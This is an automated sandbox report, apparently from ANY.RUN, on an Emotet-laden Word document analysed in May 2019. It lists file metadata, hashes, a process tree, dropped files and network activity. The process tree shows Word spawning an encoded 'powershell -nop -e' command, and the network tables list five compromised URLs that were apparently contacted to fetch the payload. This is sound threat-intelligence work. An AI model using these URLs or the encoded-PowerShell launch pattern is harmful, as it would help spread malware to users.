Field | Value
---|---
File name | INF_70647_2028252.doc
Full analysis | https://app.any.run/tasks/69a7354d-74cb-429f-bfb4-5f46518b671a
Verdict | Malicious activity
Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.
Analysis date | May 24, 2019, 19:59:35
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | 
MIME | application/msword
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: mindshare Light Frozen, Subject: Ports, Author: Madison West, Comments: Gorgeous, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri May 24 14:58:00 2019, Last Saved Time/Date: Fri May 24 14:58:00 2019, Number of Pages: 1, Number of Words: 17, Number of Characters: 97, Security: 0
MD5 | 0CEF7243A9F55DF076105FAFA59077B6
SHA1 | 662FB0A3D6FC5A175C57D3C05B00FF0B41CB8DDD
SHA256 | 6AFBD0A58C059546933C99F50E1D3E850A35CA9441F6AC2D98FDF8FB96B9EAF3
SSDEEP | 3072:a77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qB+vCmhGip1pl4Q:a77HUUUUUUUUUUUUUUUUUUUT52V+NmhD
Extension | File type (match score)
---|---
.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)
Property | Value
---|---
CompObjUserTypeLen | 32
CompObjUserType | Microsoft Word 97-2003 Document
Title | mindshare Light Frozen
Subject | Ports
Author | Madison West
Keywords | -
Comments | Gorgeous
Template | Normal.dotm
LastModifiedBy | -
RevisionNumber | 1
Software | Microsoft Office Word
TotalEditTime | -
CreateDate | 2019:05:24 13:58:00
ModifyDate | 2019:05:24 13:58:00
Pages | 1
Words | 17
Characters | 97
Security | None
CodePage | Windows Latin 1 (Western European)
Company | Rowe and Sons
Lines | 1
Paragraphs | 1
CharCountWithSpaces | 113
AppVersion | 16
ScaleCrop | No
LinksUpToDate | No
SharedDoc | No
HyperlinksChanged | No
TitleOfParts | -
HeadingPairs | 
Manager | Hackett
PID | CMD | Path | Indicators | Parent process | User | Company | Integrity level | Description | Version | Exit code
---|---|---|---|---|---|---|---|---|---|---
3708 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\INF_70647_2028252.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Microsoft Word | 14.0.6024.1000 | —
2616 | powershell -nop -e [encoded command omitted] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 6.1.7600.16385 (win7_rtm.090713-1255) | 0
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3F8D.tmp.cvr | — | — | —
2616 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AN5POP70IA3SWCT0PW4V.temp | — | — | —
3708 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\INF_70647_2028252.doc.LNK | lnk | CA6995F62DD8B17743CD8EF9AA5CC8B1 | 0354C135D3630E6DE346B9EC18C5DB18D1C69B72209445722E3D22765CCE7F55
3708 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 78854943818252C6E83A83506E030BA5 | 70605DF163FEFE0262A4C8EC5FEA5164CDA9B34A06150B7FAA60DE41EEFE53B8
3708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C0FEAB0A.wmf | wmf | 95B5BED7F2DADDF367D636778CE3C9E5 | 90325BBA44EEACA0DDB89CE8E0792505CD7EE37A788AF61B9D4080E8D7006ECD
3708 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | C55125751F7C6D1BCD0F4954FA03BCBC | 5EFBD0D813F184B8A16B94BBC8097CF11CF8C76B0731147C0A39E92B149BA547
3708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A7C91E9C.wmf | wmf | C2E94C04DB721DABCC157FCE170096EC | 798AFAFBA42A36BABF7FF4C798AC94637FE6ECA2AE47EEF0FDAD1E9CDC8F4F6C
3708 | WINWORD.EXE | C:\Users\admin\Downloads\~$F_70647_2028252.doc | pgc | D83D4FF30910E23991056DFEF81962F9 | BF51C66E000F21975A329D186B78204421885A233310A0E888B5B5B4CEA49D9F
3708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB812EDE.wmf | wmf | 184A881C43C32297F194764ABBAA2B8C | EE2B30A208BB5BA80AA9B0E90656FBA7F997B360627D06F45EBFE03CBC66296C
3708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A4A4B5ED.wmf | wmf | BCF860AEBF2005A184DE42A7AA1EDD60 | A417C3F918B8FE0AF0AF8CD6F68CC58DBBF93785A01D1924EA32353C329713AB
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2616 | powershell.exe | GET | 404 | 107.180.14.26:80 | http://bonespecialistsinmangalore.com/images/ehbim9q_qgre5mcjf9-69608/ | US | xml | 345 b | malicious |
2616 | powershell.exe | GET | 404 | 27.254.81.83:80 | http://4gstartup.com/wp-content/wotdrnPG/ | TH | xml | 345 b | malicious |
2616 | powershell.exe | GET | 404 | 138.197.32.141:80 | http://www.maisonmanor.com/wp-content/unRpFYCwFf/ | US | xml | 345 b | suspicious |
2616 | powershell.exe | GET | 404 | 103.101.162.43:80 | http://hondathudo.com/wp-snapshots/cnwnwsqh_55c9q-928746/ | unknown | xml | 345 b | unknown |
2616 | powershell.exe | GET | 404 | 192.3.2.170:80 | http://betabangladesh.com/wp-includes/24thfsvoy_ty0ixhm-59/ | US | xml | 345 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2616 | powershell.exe | 138.197.32.141:80 | www.maisonmanor.com | Digital Ocean, Inc. | US | suspicious |
2616 | powershell.exe | 107.180.14.26:80 | bonespecialistsinmangalore.com | GoDaddy.com, LLC | US | malicious |
2616 | powershell.exe | 103.101.162.43:80 | hondathudo.com | — | — | unknown |
2616 | powershell.exe | 27.254.81.83:80 | 4gstartup.com | CS LOXINFO Public Company Limited. | TH | malicious |
2616 | powershell.exe | 192.3.2.170:80 | betabangladesh.com | ColoCrossing | US | malicious |
Domain | IP | Reputation
---|---|---
www.maisonmanor.com | — | suspicious
4gstartup.com | — | malicious
bonespecialistsinmangalore.com | — | malicious
hondathudo.com | — | unknown
betabangladesh.com | — | malicious